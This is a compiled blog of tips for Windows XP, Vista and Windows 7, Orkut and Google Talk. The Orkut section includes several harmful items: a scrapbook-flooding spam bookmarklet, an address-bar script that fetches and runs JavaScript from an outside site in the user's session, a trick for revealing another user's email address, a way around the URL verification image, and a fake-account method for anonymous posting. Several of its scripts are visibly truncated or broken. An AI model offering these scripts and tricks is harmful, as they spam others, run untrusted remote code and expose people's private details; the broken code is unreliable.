XP Secrets

Defrag

Secret - Hidden Command Line Switch

Instructions - Go to "Start", "Run" and Type defrag c: -b to defragment the Boot and Application Prefetch information.

Notes - Windows XP will run this automatically every three days or so, during system idle periods. BootVis will evoke this when you run the "Optimize System" function. There is no need to manually run this unless you wish to immediately optimize a newly installed application's load time.


IExpress

Secret - Hidden Install Creator

Instructions - Go to Start, Run, type iexpress - Source

Notes - IExpress is a technology designed to simplify creation of a setup program. Using the step-by-step IExpress Wizard, you can create self-extracting files that automatically run the setup program contained inside. The setup program can be an .inf file or an executable program. IExpress technology automatically removes the setup files after installation, saving the user time and frustration.


MS-DOS Editor

Secret - Hidden Text Editor

Instructions - Go to Start, Run, type edit - Source

Notes - Windows XP comes with another text editor besides Notepad - it's called the MS-DOS Editor, and it's commonly referred to simply as Edit. It has features similar to Notepad, as well as additional features such as the ability to work with multiple text files and change the background and text colors.


Netmeeting

Secret - Hidden Internet Conference Application

Instructions - Go to Start, Run, type conf - Source

Notes - Windows XP is the last version of Microsoft Windows to include NetMeeting. NetMeeting delivers a complete Internet conferencing solution for all Windows users with multi-point data conferencing, text chat, whiteboard, and file transfer, as well as point-to-point audio and video.


Notepad

Secret - Create a Log File

Instructions - Launch Notepad, Type .LOG on the first line, and then press Enter to move to the next line. On the File menu, click Save As, type a descriptive name for your file in the File name box, and then click OK. When you next open the file, note that the date and time have been appended to the end of the log, immediately preceding the place where new text can be added. You can use this functionality to automatically add the current date and time to each log entry. - Source


Paint

Secret - Image Trails

Instructions - Open an image and hold down Shift then drag the image around to create an image trail.

Secret - 10x Zoom

Instructions - Open an image and select the magnifying glass icon. Left-Click exactly on the line below the 8x.


Private Character Editor

Secret - Hidden Font Editor

Instructions - Go to Start, Run, type eudcedit - Source

Notes - You can use Private Character Editor to create unique letters and logos for your font library.


Windows Chat

Secret - Hidden Windows Chat Program

Instructions - Go to Start, Run, type winchat - Source

Notes - You can use Windows Chat on your computer to communicate with someone on another computer. Both computers must be connected to the same network (for example, a local area network [LAN] or the Internet). Also, each computer must be running a similar protocol, such as TCP/IP.


Windows Media Player 5.1

Secret - Hidden Windows Media Player

Instructions - Go to Start, Run, type mplay32


Windows Media Player 6.4

Secret - Hidden Windows Media Player

Instructions - Go to Start, Run, type mplayer2 - Source

Notes - Windows Media Player 6.4 (Classic) is installed along with Windows Media Player 7. The only update is that it now supports the latest codecs.


Game Secrets
FreeCell

Secret - Instant Win

Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.

Secret - Hidden Game Modes
Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.


Hearts

Secret - Show All Cards

Instructions - Go to Start, Run, Type: 'Regedit', OK. Edit this registry key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts

Right click on the Hearts folder, select New, String Value and name it ZB. Right-click on ZB, select Modify and enter a Value Data of 42, OK and close Regedit. Start Hearts (not Internet Hearts). Once in a game Press Ctrl + Alt + Shift + F12 to show all the cards.

Background - This secret is a reference to Douglas Adams' book the Hitchhiker's Guide to the Galaxy. 'ZB' is the initials of the character Zaphod Beeblebrox, the Galactic President. '42' is the answer to The Ultimate Question Of Life, the Universe and Everything.


Minesweeper

Secret - Reveal Mines

Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other than white or black to see the pixel.

Secret - Stop Timer

Instructions - Launch Minesweeper and start a game so the timer starts counting, then press the Windows Key + D to show the desktop. Now when you select minesweeper from the taskbar you can continue playing with the timer stopped.


Pinball

Secret - Extra Balls

Instructions - Type 1max at the start of a new ball to get extra balls.

Secret - Gravity Well

Instructions - Type gmax at the start of a new game to activate the Gravity Well.

Secret - Instant Promotion

Instructions - Type rmax at the start of a new game to go up in ranks.

Secret - Skill Shot

Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:

First: 15,000 points
Second: 30,000 points
Third: 75,000 points
Fourth: 30,000 points
Fifth: 15,000 points
Sixth: 7,500 points

Secret - Test Mode

Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around. While in test mode press the following keys for more secrets:

H - Get a 1,000,000,000 High Score
M - Shows the amount of system memory
R - Increases your rank in game
Y - Shows the Frames/sec rate

Secret - Unlimited Balls

Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting the game.


Solitaire

Secret - Instant Win

Instructions - Press Alt + Shift + 2 during game play to instantly win.

Secret - Draw single cards in a Draw Three game

Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.


OS Secrets
Add/Remove

Secret - Hidden Uninstall Options

Instructions - Warning: Proceed at your own risk! Browse to C:\Windows\inf\ and make a backup copy of sysoc.inf. Then open the original file C:\Windows\inf\sysoc.inf in notepad. Go to "Edit" and select "Replace". In "Find what:" type ,hide and in "Replace with:" type , then select "Replace All", save and close the file. Go to the "Control Panel", "Add/Remove", select "Add/Remove Windows Components". You will now see many more Windows components to uninstall. Do not remove anything with no label or that you do not recognize or fully understand what it does. Doing so can break certain functionality in Windows.


Control Panel

Secret - Hidden Control Panel Extensions

Instructions - Download and install TweakUI, launch, go to "Control Panel" and check any item not selected, then "Apply" and "OK". You will now see the hidden control panel extensions.


Device Manager

Secret - Hidden Devices

Instructions - Go to the "Control Panel", "System" icon, "Hardware" tab and select "Device Manager". Select "View" and Show hidden devices.

Secret - Phantom Devices

Instructions - Go to "Start", "Programs", "Accessories" and select "Command Prompt". At the command prompt, type "set devmgr_show_nonpresent_devices=1" and press Enter. At the command prompt, type "start devmgmt.msc" and press Enter. Select "View" and Show hidden devices. You can see devices that are not connected to the computer. - Source

Notes - When you close the command prompt window, Windows clears the "devmgr_show_nonpresent_devices=1" variable that you set and prevents phantom devices from being displayed when you select "Show hidden devices".


MIDI Files

Secret - Hidden MIDI Files

Instructions - Browse to C:\Windows\Media and you will find 3 hidden MIDI files:

flourish.mid
onestop.mid
town.mid

Notes - "MIDI" stands for "Musical Instrument Digital Interface" - A compression format for encoding music.


Music

Secret - Music from the Installer

Instructions - Browse to C:\Windows\system32\oobe\images\title.wma and play.

Notes - "OOBE" stands for "Out-of-Box Experience".


Shutdown

Secret - Display Hibernate Option on the Shut Down dialog

Instructions - Go to "Start", "Turn Off Computer..." and press either Shift key to change the "Stand By" button to "Hibernate".


Support Tools

Secret - Over 100 Windows XP Support Utilities are on the install CD

Instructions for Pre-SP2 users - If you do not have SP2 installed, put the original Windows XP CD in the CD-ROM Drive, run the D:\Support\Tools\setup.exe file.

Read More

Orkut tips and tricks

Show a cool STAR in your scraps: Just write “& # 9 7 3 3″ without spaces and quotes in your orkut scarp writing text for testing
directly in your friend’s scrapbook. And now submit your scrap. You will see a cool star icon showing up in your scrap. It is one of the simplest of orkut tricks. Isn’t it?.

Unlimited pictures in orkut album : By default an orkut user can upload only 12 pictures in orkut album. Sometimes, we have a lot of pictures to show in our orkut album but due to this restriction on number of picture uploads we could not show all we want to show in our orkut album. But now you can show unlimited number of pictures and photos using the new rss feed feature in orkut.

Sending a blank or invisible scrap
Open your friend’s scrapbook and the write anyone you wanted from the list given below:

[i], [u], [b], [i][u], [i][b], [u][i], [u][b], [u][i][b], [i][u][b], [i][u][b][i]

Now press ‘postscrap’ tab.
Accessing orkut from the place where it has been banned.
You can use proxies like http://www.proxut.com and http://www.orkutlive.info/ to access orkut.

Adding images to orkut scraps

You can send images to your friend through scrap. But the condition is that urls of those images should have .jpg, .gif, .png or .bmp in their ending.

for example, Copy and paste “http://www.desiclub.com/bollywood/photo_album/photoalbums/aamir_khan/aamir3.jpg” in scrapbook and then press ‘postscrap’. Now you will see the images as a scrap in your scrapbook.

Hiding your visits on the other’s profiles.

1) Go to ‘Setting’.
2) Click on ‘privacy’ tab and select hide profile visit.

See large display pic of your friend in your scrapbook

Copy and paste this code “javascript:document.body.innerHTML=document.body.innerHTML.replace(/small/g,”medium”);void(0)” in the address bar.

want to scrap like this
[̲̅h̲̅a̲̅i̲̅ ̲̅f̲̅r̲̅i̲̅e̲̅n̲̅d̲̅s̲̅ ̲̅h̲̅o̲̅w̲̅ ̲̅u̲̅ ̲̅d̲̅o̲̅i̲̅n̲̅g̲̅.̲̅.̲̅?̲̅]

1 Copy code and go to the profile of the person whom u want to scrap
2 Paste the code in that address bar and
3 Type the message u want to send and
4 Press the GO button and
5 Press the POST SCRAP button...

---------------------------------------------------------------------------------
javascript:var byX9=document.getElementsByTagName('textarea')[0];byX9.value="["+byX9.value.replace(//g,"̲̅")+"]";void(0);
---------------------------------------------------------------------------------
thanx to the creator

Creator Of Orkut
Hey friends check out the profile of orkut creator
Here's the Link to His Profile :

http://www.orkut.com/Profile.aspx?uid=325082930226142255

---------------------------------------------------------------------------------
Google maps in orkut
Google maps within orkut:
http://www.orkut.com/Map.aspx
Upon clicking on the link you will be able to see where your friends are located around the world( provided they filled out their details correctly).
Upon clicking on a group or a person, you will be able to see your friends address, profile link, photo (provided they filled out their details correctly)
---------------------------------------------------------------------------------
ITS NOT GOOGLE.... ITS UR NAME!!!
Go to google and wrtie goglogo in search box and hit enter...
make the first page as ur home page and then open the site write ur name
now u made ur own search site...........
---------------------------------------------------------------------------------
Google Trick
Nobody knows whether its a mistake or google purposely made ths . any way try this.........
1-Go to Google
2-Type the word "Failure" in the search box (dont put quotes)
3-Instead of clicking "Google Search," click "I'm Feeling Lucky."
---------------------------------------------------------------------------------
Send scrap to all ur friends at once
Send scrap to all your friends at once....
Install Google Pack. its absolutely FREE
Google Pack is available for free download from this Blog..
---------------------------------------------------------------------------------
Enlarge ur photo
javascript:i=128;void(setInterval("i++;document.images[2].width=i",5))

just copy paste them in ur adress bar and press enter
after preview click referesh
---------------------------------------------------------------------------------
Skins for orkut
Hey friends,got bored with same blue orkut background???
wanna change the way your orkut looks??
but the problem is its GREASEMONKEY codes and its for FIREFOX users only...
so if you don't have FIREFOX get it first!!!
Google is now providing FIREFOX with GOOGLE TOOLBAR get it now
and inform me as comment with ur mail id.. i will send u the link....
---------------------------------------------------------------------------------
Shake ur friends orkut page
javascript:function flood(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(6);

just copy paste them in ur adress bar and press enter
---------------------------------------------------------------------------------
Add rainbow effects to ur scrap
Add rainbow effects to ur scrap click here:
SOURCE:http://inutilidades.hex.com.br/orkutTools/coloredText.php
On this page...
1. write ur text in first text box.....
2. Click the button below named "Aplicar Rainbow effect"
3.Copy and paste it anywhere u want
---------------------------------------------------------------------------------
Different format for ur name ,nickname....
Go to system tools in your system open accessories then character map there open for times new roman...there u will find all the possible fonts...
OR
Make Stylish Nick NamesClick here
SOURCE:http://www.orkutando.net/eng/generators/crazy_nick.php/
Type your nick and click on "Create", copy the result and paste it wherever you want to.
---------------------------------------------------------------------------------
How to make customised messages or scraps
Hey friends did u ever wondered where these wonderful messages are coming....
dont worry here is the solution.......... check this link
SOURCE:http://www.orkutando.net/eng/generators/heart.php/
On this page...
1. write ur word(better small words) in the box
2. Click the create button
3.Copy and paste it anywhere u want
---------------------------------------------------------------------------------
Invisible name, nickname ,scraps or missed call
simple way to make any thing invisible in orkut.
just hold "alt" and press "0173" from ur num pad and now release "alt"...... and submit
OR
just type [ i ] without spaces and an invisible scrap will b sent (empty scrap)
---------------------------------------------------------------------------------
Crazy scripts
just copy paste them in ur adress bar and press enter

javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval('R++;B(R%DIL)',15);void(0)
---------------------------------------------------------------------------------
How to invert a scrap
How to invert a scrap

& # 8 2 3 8
Type it without spaces b4 ur msg and submit ur message, will be inverted.................
---------------------------------------------------------------------------------
Worst Profile Of Orkut
Hai friends see the worst profile of orkut .... :)
http://www.orkut.com/Profile.aspx?2uid=6849219260034274333
---------------------------------------------------------------------------------
Invisible scrap
Write & n b s p ; without space.

Latest ScrapBook Flooding Script
Open scrap book and paste the java code in address bar and click GO javascript:i=9874654;sar='Flooding by Shujaat Rukh \n Orkut New Flooding Script Available on Shargo.Net\n [silver]'; a=document.forms[0];a.action+='&Action.submit='; setInterval("i++; a.scrapText.value=sar+i; a.submit()",500);void(0)

Delete Your Own Scraps Script Copy Paste the this script in your ScrapBook Address bar and hit GO
javascript:i=0;mod=10;setInterval("i++;i=i%mod;document.forms[ i ].submit()",250);void(0);

If You Want To See All Pictures Of Album In Fullsize At A Time Use This CODE on the album page:
javascript:d=document.body.innerHTML; m=d.match(/http:..images3.orkut.com.images.milieu.{1,99}jpg/gi); for(z=0;z")};void(0)

This Code will Change your Display Pic into a bigger size
javascript:i=128;void(setInterval("i++;document.images[2].width=i",0))

This CODE Changes The Colour Of Your
Home Friends Messages Communities Search Media News etc etc

Blue,Green & Yellow javascript: i=0; c=["green","blue","yellow"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0)

This Code Makes your Friends Display Pic Big
javascript:document.body.innerHTML=document.body.innerHTML.replace(/small/g,"medium");void(0)

---------------------------------------------------------------------------------
If you'd like to enable the safety filter, just follow these steps:

1.Click settings on the left sidebar of your orkut profile or homepage.
2.On the general tab, find the 'safety filter' section.
3.Select the bubble next to 'do not show inappropriate content.'
4.Don't forget to click the save changes button at the bottom of the page when you're done.
---------------------------------------------------------------------------------

1. Knowing a person email id in Orkut.

Ignore the person in orkut you want to know the Email id.
Open your Gtalk with same account as for Orkut.
Go to Settings -> Blocked. in gtalk
You will see the email id of that person.

2. Write Anonymous Scraps to anyone at orkut

Create a fake account at orkut
Write the scraps to the person you want.
Delete the account and your scraps will become anonymous at orkut.

3. Finding those who has a crush on you in orkut.

Add the one you think might have crush on you.
If that person have already added you to their crush list , you will get an email.
delete all from your crush list.

4. Write a Blank Scrap to anyone in orkut.

Delete everything in the text box field.
Now holding “alt” key down press 0 1 7 3 one after the other from left to right.
That it..done
Click Post Scrap or Submit.

5. Writing your text in reverse order at orkut.

Type your text in the scrapbook.
Type & # 8 2 3 8 without spaces before the message.
Click Submit or Post scrap.

6. How to by pass the verification image while posting a url in a scrapbook in orkut.

Change http to HtTp and www to wWw.
Now post the scrap
No Verification now needed.

---------------------------------------------------------------------------------

Add Rainbow Effects to Your Scraps
You can write colorful scraps by giving words different colors. If you are not good with tweaking code then just proceed to this online tool:http://inutilidades.hex.com.br/orkutTools/coloredText.php
and write there what you want to send as scrap and hit 'Aplicar Rainbow Effect'.
You can do it yourself also. If you want to colorize the text 'Colorful Message', Following pattern would be used.

[gold]C[/gold][lime]o[/lime][silver]l[/silver][blue]o[/blue][red]r[/red]
---------------------------------------------------------------------------------
Colorize Message and Insert Smilies in Scrap Message
This tool here is a text editor and will give you an option to write your scrap text and insert smilies by selecting any of those. You can select the text and click at the colors to colorize it. Next thing you wanna do is to copy that code and paste it as a scrap and hit post scrap button.

SOURCE:http://inutilidades.hex.com.br/orkutTools/formatText.php
---------------------------------------------------------------------------------

Create Heart With Any Text for Scrap Post
Social geeks love posting shapes and symbols made by combination of weird letters. Here is a tool which will help you create a big heart out of any text suggested by you. You can select that heart and post it in scrap.

SOURCE:http://inutilidades.hex.com.br/orkutTools/asciiHeart.php
---------------------------------------------------------------------------------

Scrap In Urdu Language
This tool is an Urdu editor and will type Urdu for you. You can copy Urdu written text from there and paste it in scraps.

SOURDE:http://www.techmynd.com/tools/write-in-Urdu.php
---------------------------------------------------------------------------------

Hide Your Visits on Other’s profiles
Go to 'Setting'
Click on 'privacy' tab and select 'hide profile visit'
---------------------------------------------------------------------------------
How to Make Your Name Blank/Invisible in Orkut
Click on 'edit profile'
Hold down "alt" key and press "0173" from your keyboard Num Pad.
Now release "alt"
Update profile
---------------------------------------------------------------------------------
Blinking orkut

Just copy paste this in your browsers address bar and hit enter.

javascript:i=0;c=["red","green","blue","yellow","magenta","orange","pink","violet"]; a=document.links;setInterval(‘i++;a[i % document.links.length].style.color=c[i % c.length]‘,10);void(0); alert(“xmen_net “)

---------------------------------------------------------------------------------
check out the magical trick

Just copy paste this in your browsers address bar and hit enter.

javascript:R= 0; x1=.1; y1=.05; x2=.25; y2=.24; x3= 1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document. images; DIL=DI.length; function A(){for(i=0; i

---------------------------------------------------------------------------------
In Orkut.com, normally you can only send scraps to one person at a time.

This little script helps you to send scraps to all your friends quickly. You can even select which all friends you want to send the scrap to. Very useful for sending Christmas and New Year greetings to all your friends.
Here’s the script : -
javascript:d=document;c=d.createElement(’script’);d.body.appendChild(c);c.src=’http://www.fundazone.com/scripts/orkut-fundazone.com.js’;void(0)
---------------------------------------------------------------------------------
The following are some of my collection regarding Orkut hacks

1) Zeetab(Orkut Star) – Computer World, Orkut Computer Tips and Tricks, Free Sms, Wallpaper
, Mobile Software Game Ringtone Themes, Free games, Orkut Software, Bollywood wallpaper, MP3, FM Rradio and many more

2) Thisisorkut.org (TIO) – This Is Orkut (T.I.O) was created to provide more info and help tracks to Orkut users for their convenience. Easy to use Java Scripts, Online Toolbars, Help References, Trouble shooters, and lot more….

3) CrazySouls.com – Crazy souls have created many orkut scripts and they are really useful and working. Not only scripts they also profide stuffs for MSN, Cheets and many more

4) Trickfriend.com – Here, on this website, you will find tips and tricks that will help in making your life easier on Orkut. This webpage also contains many sftware related to Orkut

5) Tools Home – This site is developed by 15 yr Old boy, this site contains some cool stuffs and software

6) ScrapMania.com – This site provide services like Messages, Generators, ASCII Art, Bar Arts, Images, Emotions, Smailies and many more

7) Orkut Underworld – This is blog which have awesome collection of orkut tips and tricks, softwares and many more. In short simple blog but useful blog

Orkutrix.com – In the world of Orkut tricks! You find only GENUINE and popular orkut tricks and scripts here. Browse through the menu for those tricks but they also provide some hacking tricks of orkut

9) InsideOrkut.com – According to me this is the best of all because this website posts all the current information in orkut, this website is very useful for begineers and also for everyone

10) OrkutPlus! – Orkut plus is really a Plus to Orkut they are providing Best Compilation of Orkut Hacks, Tips-Tricks and Cheat Scripts ! as they are publishing

11) Devils workshop – This blog contains not only tips and tricks for Orkut it also having some best collection for My space, You tube, Google, Ad sense, and many more. More over I like the labels cloud on that blog

12) Digital Me – this blog just started before 2 months but it contains wide range of softwares, Java scripts, GM scripts, etc..
---------------------------------------------------------------------------------

Read More

Google Talk Tips & Tricks

Some people say Google Talk is nice because of its minimalistic design, but they coudn't use an Instant Messenger that doesn't have smileys and font customization. Here are some tips that will make your work with Google Talk better.

Keyboard shortcuts

* CTRL + Mousewheel up/down: Change the font size in a conversation window.
* CTRL + E: Center text
* CTRL + R: Right justify text
* CTRL + L or CTRL+J: Left justify text
* F9: Open Gmail to send an email to the person you talk to
* F11: Start a call
* F12: Stop the current call
* ESC: Close the current window

Conversation

* Some smileys are converted by Google Talk: :-| :-O :-x :-P :-D ;-) :-( :-) B-) :'( :| :O :x :P :D :) :( :)
* To write bold text, type *your gtalk message*
* To write italic text, type _your gtalk message_

Startup parameters (go to Start/Run and type "c:\Program Files\Google\Google Talk\googletalk.exe" /one_parameter_from_the_list_below)

* /nomutex: allows you to open more than one instance of Google Talk.
* /register: write Google Talk settings in the registry.
* /checkupdate: check for new version.
* /factoryreset: revert to default settings.
* /mailto email@gmail.com: send an email with Gmail.
* /diag: start Google Talk in diagnostic mode.

Read More

Tweaks, Tips, and Tricks for Windows Vista

1.If you’re annoyed by Internet Explorer’s incessant barking that you’ve lowered your Security Settings (like, if you’re a non-paranoid expert), launch “gpedit.msc” from either the Run command or Start Search field, navigate through Local Computer Policy / Computer Configuration / Administrative Templates / Windows Components / Internet Explorer. In the rightmost pane, double-click “Turn off the Security Settings Check feature” and set it to Enabled.
2.If Internet Explorer’s Information Bar also annoys you, you can turn it off (again) in the Group Policy Object Editor (gpedit.msc) through Local Computer Policy / Computer Configuration / Administrative Templates / Windows Components / Internet Explorer / Security Features. In the rightmost pane, double-click “Internet Explorer Processes” and set it to Disabled. Hallelujah!
3.I’ve just mentioned two tweaks that are buried inside the Group Policy Editor. Jim Allchin pointed out that there’s a Group Policy Settings Reference spreadsheet available. Makes for great weekend reading.
4.Read the Background on Backgrounds if you’re a performance junkie. Don’t set your wallpaper through Internet Explorer ever again! Now that Windows supports JPG wallpapers, there’s absolutely no need (or excuse) for using BMPs anymore.
5.If you insist on keeping UAC (User Account Control) turned on for yourself, you might care to make the elevation prompts a bit less visually jarring. Brandon told me about this one, even though I have UAC turned off. Launch the Local Security Policy manager (secpol.msc), and navigate through Security Settings / Local Policies / Security Options. In the rightmost pane, scroll to the bottom and double-click “User Account Control: Switch to the secure desktop when prompting for elevation.” Disable it, and you can keep UAC turned on without getting turned off by the embarrassingly craptacular Aero Basic theme.
6.Vista can send you emails! The Computer Management tool can still be accessed by right-clicking “Computer” and selecting “Manage” from the menu. However, now you can attach a task to any event. Try navigating through System Tools / Event Viewer / Windows Logs / Application. Now, go ahead and select an event – then look to the rightmost pane and click “Attach Task to This Event.” Name it whatever, describe it however, click through the next step, then in the Action step, you’ll see the “Send an e-mail” option.
7.The Windows Task Manager gives you a lot more troubleshooting information in Vista. Flip to the Processes tab, and in the View menu, click “Select Columns” and add Description, Command Line, and Image Path Name. Moreover, when you right-click a process, you can select either “Go to Service(s)” or “Open File Location.” These are all long overdue options.
8.This one’s interesting. Open up the Date and Time Control Panel applet. Flip to the “Additional Clocks” tab. There, you can configure two more clocks from different time zones. They’ll appear in the tooltip when you hover over the Taskbar clock. No additional software (or silly sidebar widgets) necessary.
9.Applicable in other versions of Windows, I’m going to throw it in here for good measure. Create a shortcut to RegSvr32.exe in your SendTo folder. To get there quickly, enter “shell:sendto” in the Run command dialog or Start Search field. Now, when you wanna register a DLL or OCX file with the system, you can select it/them and “Send To” the RegSvr32 shortcut.
10.I figured I’d round out my first set of Windows Vista tips and tricks with a tiny bit of eye candy. It doesn’t beat Picasa, but the Windows Photo Gallery is better than nothing. Once it’s indexed all your photos, click the icon next to the Search field and turn on the “Table of Contents.” That’s kinda nifty.

Read More

Windows 7 tips, tricks and secrets

1. Problem Steps Recorder

As the local PC guru you're probably very used to friends and family asking for help with their computer problems, yet having no idea how to clearly describe what's going on. It's frustrating, but Microsoft feels your pain, and Windows 7 will include an excellent new solution in the Problem Steps Recorder.

When any app starts misbehaving under Windows 7 then all your friends need do is click Start, type PSR and press Enter, then click Start Record. If they then work through whatever they're doing then the Problem Steps Recorder will record every click and keypress, take screen grabs, and package everything up into a single zipped MHTML file when they're finished, ready for emailing to you. It's quick, easy and effective, and will save you hours of troubleshooting time.

2. Burn images

Windows 7 finally introduces a feature that other operating systems have had for years - the ability to burn ISO images to CDs or DVDs. And it couldn't be much easier to use. Just double-click the ISO image, choose the drive with the blank disc, click Burn and watch as your disc is created.

3. Create and mount VHD files

Microsoft's Virtual PC creates its virtual machine hard drives in VHD files, and Windows 7 can now mount these directly so you can access them in the host system. Click Start, type diskmgmt.msc and press Enter, then click Action > Attach VHD and choose the file you'd like to mount. It will then appear as a virtual drive in Explorer and can be accessed, copied or written just like any other drive.

Click Action > Create VHD and you can now create a new virtual drive of your own (right-click it, select Initialise Disk, and after it's set up right-click the unallocated space and select New Simple Volume to set this up). Again, you'll be left with a virtual drive that behaves just like any other, where you can drag and drop files, install programs, test partitioning software or do whatever you like. But it's actually just this VHD file on your real hard drive which you can easily back up or share with others. Right-click the disk (that's the left-hand label that says "Disk 2" or whatever) and select Detach VHD to remove it.

The command line DISKPART utility has also been upgraded with tools to detach a VHD file, and an EXPAND command to increase a virtual disk's maximum size. Don't play around with this unless you know what you're doing, though - it's all too easy to trash your system.

4. Troubleshoot problems

If some part of Windows 7 is behaving strangely, and you don't know why, then click Control Panel > Find and fix problems (or 'Troubleshooting') to access the new troubleshooting packs. These are simple wizards that will resolve common problems, check your settings, clean up your system and more.

5. Startup repair

If you've downloaded Windows 7 (and even if you haven't) it's a good idea to create a system repair disc straight away in case you run into problems booting the OS later on. Click Start > Maintenance > Create a System Repair Disc, and let Windows 7 build a bootable emergency disc. If the worst does happen then it could be the only way to get your PC running again.

6. Take control

Tired of the kids installing dubious software or running applications you'd rather they left alone? AppLocker is a new Windows 7 feature that ensures users can only run the programs you specify. Don't worry, that's easier to set up than it sounds: you can create a rule to allow everything signed by a particular publisher, so choose Microsoft, say, and that one rule will let you run all signed Microsoft applications. Launch GPEDIT.MSC and go to Computer Configuration > Windows Settings > Security Settings > Application Control Policies > AppLocker to get a feel for how this works.

7. Calculate more

At first glance the Windows 7 calculator looks just like Vista's version, but explore the Mode menu and you'll see powerful new Statistics and Programmer views. And if you're clueless about bitwise manipulation, then try the Options menu instead. This offers many different unit conversions (length, weight, volume and more), date calculations (how many days between two dates?), and spreadsheet-type templates to help you calculate vehicle mileage, mortgage rates and more.

Don't take any Windows 7 applet at face value, then - there are some very powerful new features hidden in the background. Be sure to explore every option in all Windows applets to ensure you don't miss anything important.


CALCULATE MORE: The new Calculator is packed with useful features and functionality

8. Switch to a projector

Windows 7 now provides a standard way to switch your display from one monitor to another, or a projector - just press Win+P or run DisplaySwitch.exe and choose your preferred display. (This will have no effect if you've only one display connected.)

9. Get a power efficiency report

If you have a laptop, you can use the efficiency calculator to get Windows 7 to generate loads of useful information about its power consumption. Used in the right way, this can help you make huge gains in terms of battery life and performance. To do this you must open a command prompt as an administrator by typing 'cmd' in Start Search, and when the cmd icon appears, right-click it and choose Run as administrator.

Then at the command line, just type in 'powercfg -energy' (without quotes) and hit Return, and Windows 7 will scan your system looking for ways to improve power efficiency. It will then publish the results in an HTML file, usually in the System32 folder. Just follow the path it gives you to find your report.

10. Understanding System Restore

Using System Restore in previous versions of Windows has been something of a gamble. There's no way of telling which applications or drivers it might affect - you just have to try it and see.

Windows 7 is different. Right-click Computer, select Properties > System Protection > System Restore > Next, and choose the restore point you'd like to use. Click the new button to 'Scan for affected programs' and Windows will tell you which (if any) programs and drivers will be deleted or recovered by selecting this restore point. (Read our full Windows 7 System Restore tutorial.)

11. Set the time zone

System administrators will appreciate the new command line tzutil.exe utility, which lets you set a PC's time zone from scripts. If you wanted to set a PC to Greenwich Mean Time, for instance, you'd use the command

tzutil /s "gmt standard time"

The command "tzutil /g" displays the current time zone, "tzutil /l" lists all possible time zones, and "tzutil /?" displays details on how the command works.

12. Calibrate your screen

The colours you see on your screen will vary depending on your monitor, graphics cards settings, lighting and more, yet most people use the same default Windows colour profile. And that means a digital photo you think looks perfect might appear very poor to everybody else. Fortunately Windows 7 now provides a Display Colour Calibration Wizard that helps you properly set up your brightness, contrast and colour settings, and a ClearType tuner to ensure text is crisp and sharp. Click Start, type DCCW and press Enter to give it a try.

13. Clean up Live Essentials

Installing Windows Live Essentials will get you the new versions of Mail, Movie Maker, Photo Gallery and others - great. Unfortunately it also includes other components that may be unnecessary, but if you like to keep a clean system then these can be quickly removed.

If you left the default "Set your search provider" option selected during installation, for instance, Windows Live will install Choice Guard, a tool to set your browser home page and search engine, and prevent other programs from changing them. If this causes problems later, or you just decide you don't need it, then Choice Guard may be removed by clicking Start, typing msiexec /x and pressing [Enter].

Windows Live Essentials also adds an ActiveX Control to help upload your files to Windows Live SkyDrive, as well as the Windows Live Sign-in Assistant, which makes it easier to manage and switch between multiple Windows Live accounts. If you're sure you'll never need either then remove them with the Control Panel "Uninstall a Program" applet.

14. Add network support

By default Windows Live MovieMaker won't let you import files over a network, but a quick Registry tweak will change this. Run REGEDIT, browse to HKEY_CURRENT_USER\Software\Microsoft\Windows Live\Movie Maker, add a DWORD value called AllowNetworkFiles and set it to 1 to add network support.

15. Activate XP mode

If you've old but important software that no longer runs under Windows 7, then you could try using XP Mode, a virtual copy of XP that runs in a window on your Windows 7 desktop. But there's a big potential problem, as XP Mode only works with systems that have hardware virtualisation (AMD-V or Intel VT) built-in and turned on. If you've a compatible CPU then this may just be a matter of enabling the option in your BIOS set-up program, however some high profile brands, including Sony Vaio, disable the setting for "security reasons". And that blocks XP Mode from working, too.

One solution has emerged, but it's a little risky, as essentially you'll have to alter a byte in your laptop firmware and hope this doesn't have any unexpected side-effects. Gulp. If you're feeling brave then take a look at the Feature Enable Blog for the details, but don't blame us if it goes wrong.

A safer approach might be to use VirtualBox, a virtualisation tool that doesn't insist on hardware support, but then you will need to find a licensed copy of XP (or whatever other Windows version your software requires) for its virtual machine.

16. Enable virtual Wi-Fi

Windows 7 includes a little-known new feature called Virtual Wi-Fi, which effectively turns your PC or laptop into a software-based router. Any other Wi-Fi-enabled devices within range - a desktop, laptop, an iPod perhaps - will "see" you as a new network and, once logged on, immediately be able to share your internet connection.

This will only work if your wireless adapter driver supports it, though, and not all do. Check with your adapter manufacturer and make sure you've installed the very latest drivers to give you the best chance.

Once you have driver support then the easiest approach is to get a network tool that can set up virtual Wi-Fi for you. Virtual Router (below) is free, easy to use and should have you sharing your internet connection very quickly.


If you don't mind working with the command line, though, maybe setting up some batch files or scripts, then it's not that difficult to set this up manually. See Turn your Windows 7 laptop into a wireless hotspot for more.


17. Explore God Mode

Windows 7 has changed Control Panel a little, but it's still too difficult to locate all the applets and options that you might need. God Mode, however, while not being particularly godlike, does offer an easier way to access everything you could want from a single folder.

To try this out, create a new folder and rename it to:


